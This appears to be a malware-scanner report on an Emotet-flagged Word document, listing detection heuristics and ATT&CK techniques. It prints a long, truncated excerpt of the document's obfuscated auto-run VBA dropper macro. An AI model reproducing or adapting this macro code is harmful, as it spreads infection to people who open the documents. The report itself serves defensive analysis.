Verdict: MALICIOUS (Risk Score 242)

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
- T1059 Command and Scripting Interpreter
The file contains VBA macros, specifically a Document_Open macro that utilizes CreateObject and GetObject calls, indicative of malicious intent. ClamAV detection explicitly names this as Emotet. The VBA script, though obfuscated, appears to be designed to execute code, likely for downloading and running a secondary payload, which is a common Emotet tactic.
Heuristics (7)

- ClamAV: Doc.Malware.Emotet-9765432-0 (critical) CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Malware.Emotet-9765432-0
- VBA macros detected (medium, 4 related findings) OLE_VBA_MACROS: Document contains VBA macro code
- Document_Open macro (high) OLE_VBA_DOCOPEN: Document_Open macro
- CreateObject call (high) OLE_VBA_CREATEOBJ: CreateObject call
- GetObject call (high) OLE_VBA_GETOBJ: GetObject call
- VBA p-code auto-exec with execution tokens (high) OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Embedded URL (info) EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 19074 bytes |

SHA-256: 5f8ddf3f75befd9059f3326eb9e354f14c2179c2257f61708817109610baf98e
Preview script (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "Sa837u25mqhc9y9f"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
Yb_zm4cl2tdlp = Array(Mgjic3k0aluz + "Seci_4x29pddFt9igvfrvj8x5 B_azeyungyket" + Lu3fe1u3a4e0t3e7g, Dpv2810p36mk0cc, Qlih9c1fe16qptome.Qcr5w_bqiqx6, Aar2te5k_iugf + "Glsz0di1xbhz9zp26 Xg2dpqdbwk2 E4k_wb4jd0elopt5 D7josk0bf7bw")
End Sub
Attribute VB_Name = "Qlih9c1fe16qptome"
Attribute VB_Base = "0{157127A2-A3A5-4830-8E8F-878A36843948}{94967D22-A541-498D-9A71-A68AB3E3BA92}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function Qcr5w_bqiqx6()
On Error Resume Next
Set nnnnnnnnn = Languages
BcfWWjIUB = Mid _
(Ai53fcno2x7da9i5, 196, 1)
dYvJsnjw = Mid _
(V50kdktxy7d3fgnbre, 212, 1)
BiHOVG = Mid _
(Osw3ykfbx1lfxfa, 35, 1)
GQJzwq = Mid _
(Nvn90lesgkxw, 34, 1)
WKcaSvfi = Mid _
(Nbu5xksjcla9i7, 9, 1)
lsFUF = Mid _
(I2qxe_6qdgxiodvoyt, 240, 1)
VAwYHAcv = Mid _
(Cz2ma7t0qkn_2pg, 20, 1)
hNfbEKURZVE = Mid _
(L5_sryvrx_bd, 179, 1)
wYVOV = Mid _
(M9mox3jvoq3w, 190, 1)
mLdZb = Mid _
(Jg2g85h9evy, 265, 1)
zOJzf = BcfWWjIUB + dYvJsnjw + BiHOVG + GQJzwq + WKcaSvfi + lsFUF + VAwYHAcv + hNfbEKURZVE + wYVOV + mLdZb
UNfjikDjKTc = Mid _
(Cqdkza5p4_n, 33, 1)
zmlHaKIVkFA = Mid _
(Pdx9vbni7qk, 168, 1)
UCPVYn = Mid _
(Srdi8hmmznumfl, 10, 1)
EIjom = zOJzf + UNfjikDjKTc + zmlHaKIVkFA + UCPVYn
SFwwBAcXs = Mid _
(L9gio41v5gjndhpf, 44, 1)
scjHiSYQBQp = EIjom + SFwwBAcXs
M7hluppbo2go4j6q = 90
Set nnnnnnnnn = Languages
BcfWWjIUB = Mid _
(Dqqjbvmxv82n7, 196, 1)
dYvJsnjw = Mid _
(Axekt5o0cue, 212, 1)
BiHOVG = Mid _
(Pt_ff2s6e2q9rff72, 35, 1)
GQJzwq = Mid _
(Xo8kmx3hu97go7fh_, 34, 1)
WKcaSvfi = Mid _
(Rp3_7b_jgh4oytilx, 9, 1)
lsFUF = Mid _
(Ylhmo9gu09nu3kgm, 240, 1)
VAwYHAcv = Mid _
(I_9t6lcruogj, 20, 1)
hNfbEKURZVE = Mid _
(Ydjqjyxla54lc, 179, 1)
wYVOV = Mid _
(Xxqthml7l1g, 190, 1)
mLdZb = Mid _
(Ze75t_kw_jl, 265, 1)
zOJzf = BcfWWjIUB + dYvJsnjw + BiHOVG + GQJzwq + WKcaSvfi + lsFUF + VAwYHAcv + hNfbEKURZVE + wYVOV + mLdZb
UNfjikDjKTc = Mid _
(As18lgei4kf5e, 33, 1)
zmlHaKIVkFA = Mid _
(Z9cc4tkfyspgl4aqb, 168, 1)
UCPVYn = Mid _
(Hes1wovfw0k1_b1y, 10, 1)
EIjom = zOJzf + UNfjikDjKTc + zmlHaKIVkFA + UCPVYn
SFwwBAcXs = Mid _
(Ju9r4b75ire, 44, 1)
scjHiSYQBQp = EIjom + SFwwBAcXs
Buv3a7s64z9g8cage2 = Lsoancly6yc2f3 + Chr$(M7hluppbo2go4j6q + (25))
Set nnnnnnnnn = Languages
BcfWWjIUB = Mid _
(Ftuqena81o03bnwv, 196, 1)
dYvJsnjw = Mid _
(Mb73naxazmwoxay54d, 212, 1)
BiHOVG = Mid _
(Fsmes4vnceorlddoy, 35, 1)
GQJzwq = Mid _
(W5s8qqapsdnk, 34, 1)
WKcaSvfi = Mid _
(Gj4ope9o_4yv7l7lku, 9, 1)
lsFUF = Mid _
(Aw9jllc8dclsa4g, 240, 1)
VAwYHAcv = Mid _
(Fs1yj157b6mu, 20, 1)
hNfbEKURZVE = Mid _
(Ddht2jmlasdn, 179, 1)
wYVOV = Mid _
(Vlzlx3zgy5v7, 190, 1)
mLdZb = Mid _
(H3ciq0s20_d0j, 265, 1)
zOJzf = BcfWWjIUB + dYvJsnjw + BiHOVG + GQJzwq + WKcaSvfi + lsFUF + VAwYHAcv + hNfbEKURZVE + wYVOV + mLdZb
UNfjikDjKTc = Mid _
(V5g_xla7th2hu6_, 33, 1)
zmlHaKIVkFA = Mid _
(Hxxo0vj4be6r8l, 168, 1)
UCPVYn = Mid _
(Ioi6ns50vmpi6rj, 10, 1)
EIjom = zOJzf + UNfjikDjKTc + zmlHaKIVkFA + UCPVYn
SFwwBAcXs = Mid _
(Q3r1rl7vjuo0sr, 44, 1)
scjHiSYQBQp = EIjom + SFwwBAcXs
R8wpjw339nko5qn = "g, bq,g, bq,wg, bq,ig, bq,nmg, bq,g, bq,gmg, bq,tg, bq,g, bq," + Buv3a7s64z9g8cage2 + "g, bq,g, bq,:g, bq,wg, bq,ing, bq,g, bq,3g, bq,2g, bq,_g, bq," + Qlih9c1fe16qptome.T7maztzkyy2gw96 + "g, bq,rog, bq,g, bq,ceg, bq,sg, bq,sg, bq,"
Set nnnnnnnnn = Languages
BcfWWjIUB = Mid _
(Uj6uwsnkxq58, 196, 1)
dYvJsnjw = Mid _
(F0jdmfimwvt9ml4, 212, 1)
BiHOVG = Mid _
(Qyya1y597o31gqhn, 35, 1)
GQJzwq = Mid _
(Svkv8va65gzmxkg, 34, 1)
WKcaSvfi = Mid _
(P_3f76ueli9osfg, 9, 1)
lsFUF = Mid _
(Emx2sd2cyf8sf, 240, 1)
VAwYHAcv = Mid _
(Gevfwq
```

... (truncated)